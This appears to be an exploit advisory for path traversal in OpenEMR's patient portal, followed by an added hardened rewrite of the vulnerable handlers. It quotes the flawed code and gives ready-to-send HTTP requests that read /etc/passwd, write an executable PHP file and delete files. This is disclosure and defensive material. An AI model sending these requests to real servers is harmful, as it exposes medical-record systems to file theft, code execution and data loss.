# Exploit Title: OpenEMR 5.0.1.3 - Arbitrary File Actions
# Date: 2018-08-14
# Exploit Author: Joshua Fam
# Twitter : @Insecurity
# Vendor Homepage: https://www.open-emr.org/
# Software Link: https://github.com/openemr/openemr/archive/v5_0_1_3.tar.gz
# Version: <= 5.0.1.3
# Tested on: Ubuntu LAMP, OpenEMR Version 5.0.1.3
# CVE : CVE-2018-15142, CVE-2018-15141, CVE-2018-15140

# All three issues live in portal/import_template.php: the script takes the
# file path straight from the POST parameter "docid" and hands it to
# file_get_contents(), file_put_contents() or unlink() without confining it
# to the template directory. Any authenticated patient-portal user can
# therefore read, write or delete files with the privileges of the web
# server account. Relative paths resolve against the script's working
# directory (openemr/portal/), which is why a written .php file is reachable
# under http://hostname/openemr/portal/.

# 1. Arbitrary File Read:
# In OpenEMR a user that has access to the portal can send a malicious
# POST request to read arbitrary files.
# i. Vulnerable Code:
# if ($_POST['mode'] == 'get') {
#     echo file_get_contents($_POST['docid']);
#     exit;
# }
# ii. Proof of Concept:

POST /openemr/portal/import_template.php HTTP/1.1
Host: hostname
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: OpenEMR=k3m0vq90hhb5et06rib5l7l8fq; PHPSESSID=1dbh9mom6ib07jqovfusgjc3vs
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 26

mode=get&docid=/etc/passwd

# 2. Arbitrary File Write:
# In OpenEMR a user that has access to the portal can send a malicious
# POST request to write arbitrary files.
# i. Vulnerable Code:
# } else if ($_POST['mode'] == 'save') {
#     file_put_contents($_POST['docid'], $_POST['content']);
#     exit(true);
# }
# ii. Proof of Concept:

POST /openemr/portal/import_template.php HTTP/1.1
Host: hostname
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: OpenEMR=k3m0vq90hhb5et06rib5l7l8fq; PHPSESSID=1dbh9mom6ib07jqovfusgjc3vs
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 54

mode=save&docid=payload.php&content=<?php phpinfo();?>

# After sending this, navigate to payload.php at http://hostname/openemr/portal
# (the file is written relative to the portal directory and is executed as PHP
# because the attacker chose the extension).

# 3. Arbitrary File Delete:
# In OpenEMR a user that has access to the portal can send a malicious
# POST request to delete an arbitrary file.
# i. Vulnerable Code:
# } else if ($_POST['mode'] == 'delete') {
#     unlink($_POST['docid']);
#     exit(true);
# }
# ii. Proof of Concept:

POST /openemr/portal/import_template.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: OpenEMR=k3m0vq90hhb5et06rib5l7l8fq; PHPSESSID=1dbh9mom6ib07jqovfusgjc3vs
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 29

mode=delete&docid=payload.php

# After completing this request, when you navigate to payload.php, you should be
# greeted by a 404 page.
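# For comparison, below is a confined rewrite of the three handlers quoted above.
# This is an added example written for this page; it is not OpenEMR's own patch
# for these CVEs. It assumes a template directory $templateDir (the path and the
# .txt extension are illustrative assumptions), and it assumes the portal session
# check that precedes this code in the real file is still in place. The idea is
# the one the original code lacks: never let "docid" name a path at all, only a
# bare file name, and verify that the resolved file stays inside $templateDir.

```php
<?php
// Added example: hardened form of the import_template.php handlers in the
// advisory above. Not OpenEMR's patch. $templateDir and the .txt extension
// are assumptions for illustration.

// Assumed storage location for portal templates. Keep it outside the
// web-served tree where possible; the fixed .txt extension below additionally
// stops any saved file from being executed as PHP.
$templateDir = realpath(__DIR__ . '/../sites/default/portal_templates');

/**
 * Map a client-supplied template name to a path inside $templateDir.
 *
 * Accepts only a bare file name (no directory separators, no "..",
 * fixed extension). For files that already exist, realpath() must still
 * resolve inside $templateDir so a planted symlink cannot point elsewhere.
 * Returns null when the name is unacceptable.
 */
function resolveTemplate(string $templateDir, string $docid): ?string
{
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\.txt\z/', $docid)) {
        return null;
    }
    $path = $templateDir . DIRECTORY_SEPARATOR . $docid;
    $real = realpath($path);
    if ($real !== false && strpos($real, $templateDir . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

$mode  = $_POST['mode']  ?? '';
$docid = $_POST['docid'] ?? '';

if ($templateDir === false) {
    http_response_code(500);
    exit('template directory not available');
}

$path = resolveTemplate($templateDir, $docid);
if ($path === null) {
    // "/etc/passwd", "payload.php" and "../x.txt" all end up here.
    http_response_code(400);
    exit('invalid template name');
}

if ($mode === 'get') {
    // Serve as plain text so a template body is never interpreted as HTML.
    header('Content-Type: text/plain; charset=utf-8');
    echo file_exists($path) ? file_get_contents($path) : '';
    exit;
} elseif ($mode === 'save') {
    file_put_contents($path, $_POST['content'] ?? '');
    exit('saved');
} elseif ($mode === 'delete') {
    if (file_exists($path)) {
        unlink($path);
    }
    exit('deleted');
}

http_response_code(400);
exit('unknown mode');
```

# With this in place the three PoC requests above are all rejected with 400 at
# the resolveTemplate() step, before any filesystem call is made. Note that the
# regex is the real control here; realpath() only closes the symlink case for
# files that already exist, and the mode comparison uses === so that a missing
# or non-string "mode" cannot be coerced into a match.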